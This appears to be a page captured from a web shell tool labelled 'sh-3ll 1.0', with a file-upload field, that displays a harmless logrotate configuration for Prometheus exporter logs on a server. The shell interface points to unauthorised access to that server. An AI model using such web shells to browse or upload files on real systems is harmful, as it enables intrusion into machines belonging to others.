HOME


sh-3ll 1.0
DIR:/usr/local/lp/opt/exporters/scripts/
Upload File :
Current File : //usr/local/lp/opt/exporters/scripts/logrotate
# logrotate config for prometheus-exporters

/var/log/exporters/*_exporter { 
    copytruncate 
    compress 
    dateext 
    weekly 
    size 100M 
    rotate 3 
    missingok
}